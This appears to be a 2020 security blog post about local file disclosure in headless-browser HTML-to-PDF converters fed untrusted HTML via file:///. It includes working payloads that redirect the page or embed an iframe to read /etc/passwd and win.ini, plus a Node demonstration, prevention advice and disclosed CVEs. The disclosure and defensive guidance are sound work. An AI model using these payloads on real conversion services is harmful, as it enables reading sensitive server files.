Headless Chrome and File Protocol Scheme Security

Anand Namana
Nov 9, 2020

Introduction

With the rise of headless Chrome and Puppeteer, a well-suited orchestrator for it, the community is rapidly adopting both. Many software libraries and online vendors now use headless Chrome (driven from Node.js) to provide file format conversion services such as HTML to PDF or HTML to image.

Headless Chrome (or headless family of browsers)

Because Puppeteer renders the HTML file before converting it to PDF, any JavaScript in the HTML file is executed before the page is printed. Accepting HTTP URLs (e.g. https://www.example.com) as input to this conversion does not expose online conversion tools to the issue described here. The threat arises when the input is an HTML string or an HTML file uploaded by end users.

Security Issue

Developers often accept HTML files as input, handle them with the Node.js readFile or readFileSync functions using a URL object, and pass these untrusted files to Puppeteer's page.goto() function. The goto function accepts both the http and file protocols for navigation. If an untrusted file is loaded through the file:/// protocol scheme, an attacker can load arbitrary files present on the server using an <iframe> or by setting the window.location, document.location or self.location property. The document's location can be verified quickly by including the JS snippet below in the HTML submitted for conversion:

<script>document.write(window.location)</script>

If the output PDF shows a location that starts with the file:/// protocol scheme, it is likely that arbitrary files on the server can be loaded. A malicious user can then load other files present on the server using the snippet below:

<script>document.write(window.location='/etc/passwd')</script>

or by embedding an <iframe> whose src is file:///etc/passwd.
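The following is a minimal sketch of why the payload above reaches the local file system, not the code of any particular converter. The helper names convertUploadUnsafe and resolveAgainst, the parameter uploadPath and the example paths are hypothetical; page is assumed to be a Puppeteer Page object supplied by the caller. The first function shows the risky pattern of opening an upload through a file URL, and the second uses Node's URL class to show how a relative target such as /etc/passwd resolves against the document's own location.

```javascript
const { pathToFileURL } = require('url');

// Hypothetical helper illustrating the risky pattern: the uploaded file is
// opened through a file:// URL, so its scripts run with a file: location.
// `page` is assumed to be a Puppeteer Page; `uploadPath` is an illustrative name.
async function convertUploadUnsafe(page, uploadPath) {
  const target = pathToFileURL(uploadPath).href; // a file:/// URL for the upload
  await page.goto(target);
  return page.pdf();
}

// Resolve a navigation target against the document's location, the way a
// URL parser resolves window.location = '/etc/passwd'.
function resolveAgainst(base, target) {
  return new URL(target, base).href;
}

// With a file: base, the payload points at a local file.
console.log(resolveAgainst('file:///tmp/uploads/input.html', '/etc/passwd'));
// file:///etc/passwd

// With an http(s) base, the same payload stays on the remote host.
console.log(resolveAgainst('https://www.example.com/input.html', '/etc/passwd'));
// https://www.example.com/etc/passwd
```

The same payload is harmless to the server's file system when the document was loaded over http(s), which is why the location check with document.write(window.location) is a useful first probe.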

Demonstration

The code below uses the phantom-html-to-pdf Node library to convert HTML to PDF. A malicious payload within the HTML causes a local file to be printed instead of the HTML itself:

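var fs = require('fs');
var conversion = require("phantom-html-to-pdf")();
// Local file access is set to false here, as in the original demonstration
conversion.allowLocalFilesAccess = false;
// The payload redirects the page to a local file before it is printed
conversion({ html: "<script>document.write(window.location='c:/windows/win.ini')</script>" }, function(err, pdf) {
  if (err) { return console.error(err); }
  var output = fs.createWriteStream('PDF-Out.pdf');
  console.log(pdf.logs);
  console.log(pdf.numberOfPages);
  pdf.stream.pipe(output);
});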

This example uses the phantom-html-to-pdf converter, which is based on PhantomJS, on Windows.

Prevention

Because of the high level of abstraction, it is important for developers to know what happens under the hood when using headless Chrome and Puppeteer. Headless Chrome (like Chrome) is by design expected to load local files when the file:/// protocol scheme is used. Relying on that same behavior on the server side is what makes the design vulnerable. Developers can either use Puppeteer's page.setContent() function (which has some limitations with CSS) and pass it the file contents read with readFile or readFileSync, or use the data:text/html,htmlcontent technique (not the best way, since it has limits) to render HTML files uploaded by end users. In either case, avoid the file protocol scheme for untrusted input when running headless Chrome on the server.
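The two alternatives above could be sketched as follows. This is an illustration under stated assumptions rather than a hardened implementation: the function names, the uploadPath parameter and the utf8 encoding are hypothetical, and page is assumed to be a Puppeteer Page object created by the caller (for example with browser.newPage()). Only page.setContent(), page.goto() and page.pdf() are used from Puppeteer.

```javascript
const fs = require('fs');

// Build a data: URL from untrusted HTML. The article notes that this
// approach has limits, so treat it as a fallback.
function toDataUrl(html) {
  return 'data:text/html;charset=utf-8,' + encodeURIComponent(html);
}

// Option 1: read the upload from disk and hand its contents to setContent().
// The page is never navigated to a file:// URL; a fresh page keeps its
// current URL (about:blank).
async function convertUploadWithSetContent(page, uploadPath) {
  const html = await fs.promises.readFile(uploadPath, 'utf8');
  await page.setContent(html);
  return page.pdf();
}

// Option 2: read the upload and navigate to a data: URL carrying its contents.
async function convertUploadWithDataUrl(page, uploadPath) {
  const html = await fs.promises.readFile(uploadPath, 'utf8');
  await page.goto(toDataUrl(html));
  return page.pdf();
}

// Usage sketch (assumes the puppeteer package is installed):
//   const browser = await require('puppeteer').launch();
//   const page = await browser.newPage();
//   const pdf = await convertUploadWithSetContent(page, '/tmp/uploads/input.html');
//   await browser.close();
```

In both variants the file path is only ever seen by Node's file API, never by the browser, so the rendered document does not get a file: location to navigate from.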

Vulnerabilities observed:

$150 reward: cloudconvert.com, an online service converting HTML to PDF. Issue reported and fixed.

CVE-2020-7763 (https://snyk.io/vuln/npm:phantom-html-to-pdf): issue reported and fixed.

CVE-2020-7762 (https://snyk.io/vuln/SNYK-JS-JSREPORTCHROMEPDF-1037310): issue reported and fixed.

Pending fix for one more library (WIP)

Three more online services were found vulnerable and are not fixed yet.
